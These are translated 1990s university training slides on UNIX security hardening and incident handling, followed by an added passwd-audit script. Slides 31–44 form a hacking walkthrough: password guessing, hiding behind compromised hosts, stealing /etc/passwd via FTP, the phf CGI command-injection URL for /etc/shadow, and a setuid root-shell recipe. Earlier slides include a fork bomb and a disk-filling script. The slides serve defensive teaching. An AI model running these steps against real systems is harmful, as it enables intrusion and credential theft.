    Yun-Chia Regional Network Center Training Course (云嘉区网中心研习课程.ppt)

    • Resource ID: 5935172       Size: 180.01KB        Pages: 45
Slide 1. Yun-Chia Regional Network Center Training Course: System Security Management
National Chung Cheng University Computer Center
張永榴
changccunix.ccu.edu.tw

Slide 2. System Security Management
PART I. UNIX Security Basics
PART II. Enforcing Security on Your System
PART III. Handling Security Incidents

Slide 3. PART I. UNIX Security Basics
1. Introduction
2. Users and Passwords
3. The UNIX Filesystem

Slide 4. Introduction
A computer is secure if you can depend on it and its software to behave as you expect it to.
The three parts of UNIX:
• The kernel
• Standard utility programs
• System database files

Slide 5. Prevention
1. Back up.
2. Monitor system log files and running processes.
3. Upgrade OS patches.
4. Don't install illegal packages.
5. Read news about security.

Slide 6. Users and Passwords
The crypt Algorithm

    Password    Salt    Encrypted Password
    nutmeg      Mi      MiqkFWCm1fNJI
    ellen1      ri      ri79KNd7V6.Sk
    Sharon      ./      ./2aN7ysff3qM
    norahs      am      amfIADT2iqjAf
    norahs      7a      7azfT5tIdyh0I

/etc/passwd files

    root:fi3sED95ibqR6:0:1:System Operator:/:/bin/csh
    daemon:*:1:1:/tmp
    uucp:ooRoMN9FyZNE:4:4:/usr/spool/uucpublic:/usr/lib/uucp/uucico
    rachel:eH5/.mj7NB3dx:181:100:Rachel Cohen:/u/rachel:/bin/csh
    arlin:f8fk3jlOrf34:182:100:Arlin Steinberg:/u/arlin:/bin/csh

Slide 7. Users and Passwords
Bad Passwords:
login name, anybody's name, birth date, phone number, a place, all the same letter, word in the English dictionary, all numbers, less than 6 letters, ...
Administrative Techniques
• assign passwords to users
• crack your own passwords
• shadow password files
• password aging and expiration
Summary
• ensure every account has a password
• ensure every user chooses a strong password
• use a shadow password file, if available

Slide 8. The UNIX Filesystem
• File permissions: read, write, execute
• The umask command
• SUID, SGID

    % ls -l /bin/su
    -rwsr-sr-x 1 root 16384 Sep 3 1989 /bin/su
    % find / -perm -4000 -print

Slide 9. Part II. Enforcing Security on Your System
1. Defending Your Accounts
2. Securing Your Data
3. The UNIX Log Files
4. Modems
5. Networks and Security
6. NFS
7. COPS
8. Patch Installation
9. Firewall

Slide 10. Defending Your Accounts
Dangerous Accounts
• accounts without passwords
• default accounts
• accounts that run a single command
• open accounts
Protecting the root Account
• secure terminals
• the wheel group

Slide 11. Securing Your Data
File backups
1. Why back up? user error, system staff error, hardware error, software error, electronic break-ins, natural disaster
2. What should you back up? user files, system databases, any system directories
3. How long back up?
Database daily checking:
/etc/passwd, /etc/group, /etc/rc*, /etc/ttys, /etc/inittab, /usr/spool/cron/crontabs, /etc/aliases, /etc/exports, /etc/vfstab, /etc/netgroup

Slide 12. The UNIX Log Files
• /usr/adm/lastlog
• /etc/utmp, /usr/adm/wtmp, /usr/adm/wtmpx
• /usr/adm/pacct
• /usr/adm/sulog

Slide 13. Modems
1. Devices: /dev/modem, /dev/ttys(0-9), /dev/ttyfa, /dev/ttyda, /dev/cua*
2. Mode and owner:

    chmod 600 /dev/modem
    chown root /dev/modem

3. Modems hang-up checking:

Slide 14. Networks and Security
• Trusted ports 0-1023: /etc/services file
• Rlogin and rsh: /etc/hosts.equiv, /.rhosts
• "r" commands in /etc/inetd.conf file
• /.netrc
• Remote print: /etc/hosts.lpd

Slide 15. Networks and Security
• Restricting FTP: /etc/ftpusers
• Set EEPROM password:

    # eeprom security-mode=full
    # eeprom security-password=
    Changing PROM password:
    New password:
    Retype password:

• Cron jobs: /var/spool/cron/crontabs file
  Set "CRONLOG=yes" in /etc/default/cron

Slide 16. Networks and Security
Finger
• /etc/inetd.conf
• kill -1 pid_of_inetd
Sendmail
1. debug, wiz, kill command
2. Delete decode aliases from the alias file. (decode: "|/usr/bin/uudecode")
3. Disable the "wizard" password in the sendmail.cf file. Example:

    # Let the wizard do what she want
    OWsitrVlWxktZ67

Slide 17. Networks and Security
Anonymous FTP
1. create ftp account.
2. mkdir ftp/bin ftp/etc ftp/pub
3. cp /bin/ls ftp/bin
4. chmod 111 ftp/pub/ftp/etc ftp/bin ftp/bin/ls
5. cp /etc/passwd ftp/etc/passwd
6. cp /etc/group ftp/etc/group
7. chmod 444 ftp/etc/*
8. chown root ftp ftp/etc/ftp/bin
9. chown ftp.ftp ftp/pub
10. chmod 555 ftp

Slide 18. NFS, NIS
1. /etc/passwd file

    +:0:0:      (wrong)
    +:*:0:0:    (on NIS clients only)

2. Netgroup: /etc/netgroup (hostname, username, domainname)

Slide 19. NFS
• /etc/exports file
• exportfs command
• showmount command

Slide 20. COPS
• File, directory and device files permissions
• /etc/passwd and /etc/group files
• SUID files
examples:

Slide 21. COPS report

    ATTENTION:
    Security Report for Wed Dec 18 13:30:30 CST 1991
    from host
    Warning! A "+" entry in /etc/hosts.equiv!
    Warning! "." (or current directory) is in root's path!
    Warning! Directory /usr/spool/mail is _World_ writable!
    Warning! File /etc/motd is _World_ writable!
    Warning! File /etc/mntab is _World_ writable!
    Warning! File /etc/remote is _World_ writable!
    Warning! File /etc/sm is _World_ writable!
    Warning! File /etc/sm.bak is _World_ writable!
    Warning! File /etc/state is _World_ writable!
    Warning! File /etc/tmp is _World_ writable!
    Warning! File /etc/utmp is _World_ writable!
    Warning! User uucp's home directory /var/spool/uucpublic is mode 03777
    Warning! Password file, line 2, negative user id: nobody:*:-2:-2:/:
    Warning! Password file, line 11, no password: sync:1:1:/:/bin/sync
    Warning! Password file, line 12, user sysdiag has uid=0 and is not root
        sysdiag:*:0:1:System Diagnostic:/usr/diag/sysdiag:/usr/diag/sysdiag/sysdiag

Slide 22. Patch Installation
ftp://sunsite.ccu.edu.tw
example:

Slide 23. Denial of Service Attacks and Solutions
I. Destruction Attacks:
1. Reformatting a disk partition
   => Prevent anyone from accessing the machine in single-user mode. Protect the superuser account.
2. Deleting critical files
   => Protect system files by specifying appropriate modes (e.g., 755 or 711). Protect the superuser account.
3. Turning off power
   => Put the computer in a physically secure location.

Slide 24. Denial of Service Attacks and Solutions
II. Overload Attacks
1. Process Overload Attacks. Example:

    main() { while (1) fork(); }

   => Solaris: /etc/system: set maxproc=100
2. System Overload
   => Set your own priority as high as you can with the renice command.

Slide 25. Denial of Service Attacks and Solutions
III. Disk Attacks
1. Disk Full Attacks:
• du command
• find / -size +1000 -exec ls -l {} \;
• quot -f /dev/sd0a
• set quotas (edquota)
• reserved space
2. Swap Space Attacks:
for Solaris:

    # mkfile 50m /home
    # swap -a /home

for SunOS:

    # mkfile 50m /home
    # swapon /home

Slide 26. Denial of Service Attacks and Solutions
IV. Tree Structure Attacks. Example:

    #!/bin/ksh
    while mkdir another
    do
        cd ./another
        cp /bin/cc fillitup
    done

=> DIY
=> shell script
=> delete the inode of the top directory

    # boot -s
    # ls -i another
    # df another
    # /usr/sbin/clri /dev/dsk/c0t2d0s2 1491
    # fsck /dev/dsk/c0t2d0s2

Slide 27. PART III. Handling Security Incidents
System intrusion detection:
1. Check the connection logs for unusual sources or operations.
2. Find all setuid and setgid files on the system.
3. Check whether system executables have been modified, such as login, su, telnet, netstat, ifconfig, ls, find, du, df, sync, and any program listed in /etc/inetd.conf.
4. Check whether a network sniffing program is running on the system.
5. Check all programs run by cron and at.

Slide 28. PART III. Handling Security Incidents
6. Check whether /etc/inetd.conf has been changed and whether the corresponding programs are correct.
7. Check for changes to the contents and file attributes of /etc/passwd.
8. Check the system and network configuration files: hosts.equiv, hosts.lpd, .rhosts
9. Find unusual or hidden files on the system:

    find / -name "." -print
    find / -name ".*" -print

10. When checking whether a machine has been intruded, every machine on the local network must be checked.

Slide 29. PART III. Handling Security Incidents
Finding traces of an intruder in the log files:
• Users logging in at odd hours: last
• System restarts for unknown reasons: w, last
• System time changes for unknown reasons: time
• Unusual error messages from sendmail, ftp, etc.: /var/adm/syslog, xferlog
• Unauthorized or suspicious use of the su command: /usr/adm/sulog
• Users coming from unfamiliar hosts: who, last

Slide 30. PART III. Handling Security Incidents
On discovering an intrusion:
1. Confirm and understand the problem
2. Stop the damage
3. Confirm your diagnosis and determine the damage
4. Restore the system
5. Deal with the root cause
6. Carry out the related recovery work

Slide 31. HACKING
There are several ways to get into a host: through Telnet (Port 23), SendMail (Port 25), FTP, or WWW (Port 80). A host has only one address, but it may run several services at the same time, so if you just want to get into the host, these ports are all good directions to try.

Demonstration of getting into a host: (By CoolFire)
(First connect to a Telnet host on which you already have an account, preferably a fake one, that is, a host that has already been cracked, and then use it to crack other hosts, so that nobody can trace back to where you are.)

    Digital UNIX () (ttypa)
    login: FakeName
    Password:
    Last login: Mon Dec 2 03:24:00 from 255.255.0.0

(What I used is , which is fake of course, everything has been modified! There is no such host! Don't worry! Don't worry! All the host names below are fake names!)

Slide 32. HACKING (Continued)

    Digital UNIX V1.2C (Rev. 248); Mon Oct 31 21:23:02 CST 1996
    Digital UNIX V1.2C Worksystem Software (Rev. 248)
    Digital UNIX Chinese Support V1.2C (rev. 3)

(Mm. I'm in! Let's start the attack! This time the target is .)

    telnet

(Try Telnet.)

    Trying 111.222.255.255.
    Connected to .
    Escape character is .
    Password:
    Login incorrect

(Never mind, try again!)

    cool login: hinet
    Password:
    Login incorrect

(None of the guesses were right. The method used here is guessing, and luck doesn't seem to be good today.)

Slide 33. HACKING (Continued)
(Start over, try a different port!)

    telnet 111.222.255.255 80
    Trying 111.222.255.255.
    Connected to 111.222.255.255.
    Escape character is .
    Error
    Error 400
    Invalid request (unknown method)
    CERN-HTTPD 3.0A
    Connection closed by foreign host.

(Wow! There isn't even a place to enter a password, really. Again! Be persistent!)
(Try the FTP port.)

Slide 34. HACKING (Continued)

    ftp 111.222.255.255
    Connected to 111.222.255.255.
    220 cool FTP server (Version wu-2.4(1) Tue Aug 8 15:50:43 CDT 1995) ready.
    Name (111.222.255.255:FakeName): anonymous
    331 Guest login ok, send your complete e-mail address as password.
    Password:
    230-Welcome, archive user! This is an experimental FTP server. If have any
    230-unusual problems, please report them via e-mail to
    230-If you do have problems, please try using a dash (-) as the first character
    230-of your password - this will turn off the continuation messages that may
    230-be confusing your ftp client.
    230-
    230 Guest login ok, access restrictions apply.
    Remote system type is UNIX.
    Using binary mode to transfer files.

(Wow! You can get in as anonymous! For the password part just enter aaa; don't leave footprints!)

Slide 35. HACKING (Continued)

    ftp> ls
    200 PORT command successful.
    150 Opening ASCII mode data connection for file list.
    etc
    pub
    usr
    bin
    lib
    incoming
    welcome.msg
    226 Transfer complete.

(Mm-hm. Great! I'm in! The next target is.)

    ftp> cd etc
    250 CWD command successful.
    ftp> get passwd

(Grab it!)

    200 PORT command successful.
    150 Opening BINARY mode data connection for passwd (566 bytes).
    226 Transfer complete.
    566 bytes received in 0.56 seconds (0.93 Kbytes/s)

(Oh. Is it that easy?)

Slide 36. HACKING (Continued)

    ftp> !cat passwd

(Take a look!)

    root:0:0:root:/root:/bin/bash
    bin:*:1:1:bin:/bin:
    daemon:*:2:2:daemon:/sbin:
    adm:*:3:4:adm:/var/adm:
    lp:*:4:7:lp:/var/spool/lpd:
    sync:*:5:0:sync:/sbin:/bin/sync
    shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown
    halt:*:7:0:halt:/sbin:/sbin/halt
    mail:*:8:12:mail:/var/spool/mail:
    news:*:9:13:news:/var/spool/news:
    uucp:*:10:14:uucp:/var/spool/uucp:
    operator:*:11:0:operator:/root:/bin/bash
    games:*:12:100:games:/usr/games:
    man:*:13:15:man:/usr/man:
    postmaster:*:14:12:postmaster:/var/spool/mail:/bin/bash
    ftp:*:404:1:/home/ftp:/bin/bash

(Damn. It's shadowed. Off to a bad start.)

    ftp> bye
    221 Goodbye.

Slide 37. HACKING (Continued)
(Not giving up. Same old saying: be persistent.)
(FTP didn't work, so try Telnet again!)

    telnet
    Trying 111.222.255.255.
    Connected to .
    Escape character is .
    Password:
    Login incorrect

(Guessed wrong again!)

    cool login: hackme
    Password:
    Last login: Mon Dec 2 09:20:07 from 205.11.122.12
    Linux 1.2.13.
    Some programming languages manage to absorb change but withstand progress.
    cool:$

(Wa-ha! What stupid root uses the system name as the username and password! Not a wasted effort after all!)

Slide 38. HACKING (Continued)
I pulled back a "messed-up" /etc/passwd; did you think I was really that dumb? What good could anything fetched as guest be? So the previous attack continues. We have already guessed a username and password that is not guest. Let's use it to get into the host and have a look!

    Digital UNIX () (ttypa)
    login: FakeName
    Password:
    Last login: Mon Dec 2 03:24:00 from 255.255.0.0
    Digital UNIX V1.2C (Rev. 248); Mon Oct 31 21:23:02 CST 1996
    Digital UNIX V1.2C Worksystem Software (Rev. 248)
    Digital UNIX Chinese Support V1.2C (rev. 3)

(Mm. I'm in! Let's start the attack! This time the target is .)

    telnet

(Try Telnet.)

    Trying 111.222.255.255.
    Connected to .
    Escape character is .
    cool login: hackme
    Password:

(Enter hackme again.)

Slide 39. HACKING (Continued)

    Last login: Mon Dec 1 12:44:10 from
    Linux 1.2.13.
    cool:$ cd /etc
    cool:/etc$ ls pa*
    passwd passwd.OLD passwd.old
    cool:/etc$ more passwd

(See whether it is shadowed.)

    root:acqQkJ2LoYp:0:0:root:/root:/bin/bash
    john:234ab56:9999:13:John Smith:/home/john:/bin/john:

(Perfect! No defenses at all!)

    cool:/etc$ exit
    logout

(Leaving! Now it's FTP's turn!)

    Connection closed by foreign host.

Slide 40. HACKING (Continued)

    ftp
    Connected to .
    220 cool FTP server (Version wu-2.4(1) Tue Aug 8 15:50:43 CDT 1995) ready.
    Name (:66126): hackme
    331 Password required for hackme.
    Password:
    230 User hackme logged in.
    Remote system type is UNIX.
    Using binary mode to transfer files
    ftp> cd /etc
    250 CWD command successful.
    ftp> get passwd
    200 PORT command successful.
    150 Opening BINARY mode data connection for passwd (350 bytes).
    226 Transfer complete.
    350 bytes received in 0.68 seconds (1.9 Kbytes/s)
    ftp> !cat passwd
    root:acqQkJ2LoYp:0:0:root:/root:/bin/bash
    john:234ab56:9999:13:John Smith:/home/john:/bin/john:

(Look! Ha! It's the real thing!)

Slide 41. HACKING (Continued)
II. CGI Hole (phf.cgi)

    http://www.hackme.edu.tw/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

    Query Results
    /usr/local/bin/ph -m alias=x /bin/cat /etc/passwd
    root:x:0:0:0000-Admin(0000):/:/sbin/sh
    daemon:x:1:1:0000-admin(0000):/:
    bin:x:2:2:0000-admin(0000):/usr/bin:
    sys:x:3:3:0000-admin(0000):/:
    adm:x:4:4:0000-admin(0000):/var/adm:
    lp:x:71:8:0000-lp(0000):/usr/spool/lp:
    smtp:x:0:0:mail daemon user:/:
    uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp:
    nobody:x:60001:60001:uid no body:/:
    hansin:x:109:1:/home1/hansin:/usr/lib/rsh
    dayeh:x:110:1:/home1/dayeh:/usr/lib/rsh

Then try:

    http://www.hackme.edu.tw/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/shadow

Slide 42. HACKING (Continued)
#1 FTP intrusion method? Not a very practical method!
1. Connect to the FTP server.
2. When the system asks you for the User Name, press Enter and ignore it.
3. For Password, enter - quote user ftp
4. Then enter - quote cwd root
5. Then enter - quote pass ftp
This method seems to work only on very old FTP servers; it should not succeed on any of the machines currently in this country. If you want to try it, look for FTP servers at foreign universities! What is the result of following the steps above? Hee.he. You are root!

Slide 43. HACKING (Continued)
#2 One of the Linux 1.2.13 holes? Become root!
Linux 1.2.13 has many holes. If the version you use is newer, you can rest easy; otherwise you can follow the method below to test your system!
1. Telnet to
2. After login, enter - finger
3. Then - finger, and wait for root to log in
4. Use a WWW browser to connect to
5. In Location, enter - back in the Telnet software - cp /bin/sh /tmp/.sh"
7. Then enter - chmod 4755 /tmp/.sh
(You're root now!)

Slide 44. HACKING (Continued)
#3 Xfree86 3.1.2 has a hole that lets other people delete "any" file? Yes! Including etc/passwd!

    - cut here, start code exploit.sh -
    #!/bin/sh
    echo "Running exploit to check the Xfree86 3.1.2 hole!"
    echo "Creating file called /tmp/blah which will contain a few words."
    echo "This version is NOT exploitable!" > /tmp/blah
    ln -s /tmp/blah /tmp/.tX0-lock
    startx
    echo "Now Check /tmp/blah and if it says:"
    echo "This version is NOT exploitable!"
    echo "then the version you have is not exploitable!"
    echo "Otherwise, it should have a few numbers, then it is exploitable!"
    - cut here, end of code exploit.sh -

How do you patch this hole?
1. Set it so that only the superuser can run it! Use the chmod 4700 command.
2. Create a group, add only trustworthy people to this group, and make the file executable only by this group.

Slide 45. Web pages about system security
1. Taiwan Computer Network Crisis Response Center (台灣電腦網路危機處理中心) http://www.cert.org.tw
2. System Security Studio (系統安全工作室) http:/networking/474/
3. Complete Anti-Hack Handbook (完全防Hack手冊) http://fly.to/jlhack
4. USA cert http://www.cert.org
5. System security discussion board (系統安全討論區) http://bbs.nsysu.edu.tw/planetxt/boards/security/
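
The password-file findings in the COPS report slide and the /etc/passwd checks in Parts I to III (accounts without a password, a non-root account with uid 0, a negative uid, a bare NIS "+" entry) can be checked with a short script. This is an added example, not part of the original slides and not COPS code; the function names audit_passwd and sample_passwd and the sample entries are constructed for illustration.

```shell
#!/bin/sh
# Added example, not COPS itself: password-file checks in the style of the
# COPS warnings above. Reads passwd-format text from FILE or from stdin.
audit_passwd() {
    awk -F: '
        /^[ \t]*$/ { next }                      # ignore blank lines
        substr($1, 1, 1) == "+" {                # NIS include entry
            if ($2 == "")
                printf "line %d: NIS + entry with empty password field\n", NR
            next
        }
        NF != 7 {                                # passwd lines have 7 fields
            printf "line %d: malformed entry (%d fields): %s\n", NR, NF, $1
            next
        }
        $2 == "" { printf "line %d: no password: %s\n", NR, $1 }
        $3 ~ /^-/ { printf "line %d: negative user id %s: %s\n", NR, $3, $1 }
        $3 ~ /^[0-9]+$/ && $3 + 0 == 0 && $1 != "root" {
            printf "line %d: uid 0 but not root: %s\n", NR, $1
        }
    ' "$@"
}

# Constructed sample modelled on the entries the slides show; the password
# fields are placeholders, not real hashes.
sample_passwd() {
    cat <<'EOF'
root:PLACEHOLDERHASH:0:1:System Operator:/:/bin/csh
nobody:*:-2:-2::/:
sync::1:1::/:/bin/sync
sysdiag:*:0:1:System Diagnostic:/usr/diag/sysdiag:/usr/diag/sysdiag/sysdiag
+::0:0:::
rachel:PLACEHOLDERHASH:181:100:Rachel Cohen:/u/rachel:/bin/csh
broken:line
EOF
}

sample_passwd | audit_passwd
```

To audit a live system, run `audit_passwd /etc/passwd`; on systems with shadow passwords the second field is a marker such as `x` or `*`, so the empty-password check has to be repeated against the shadow file.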
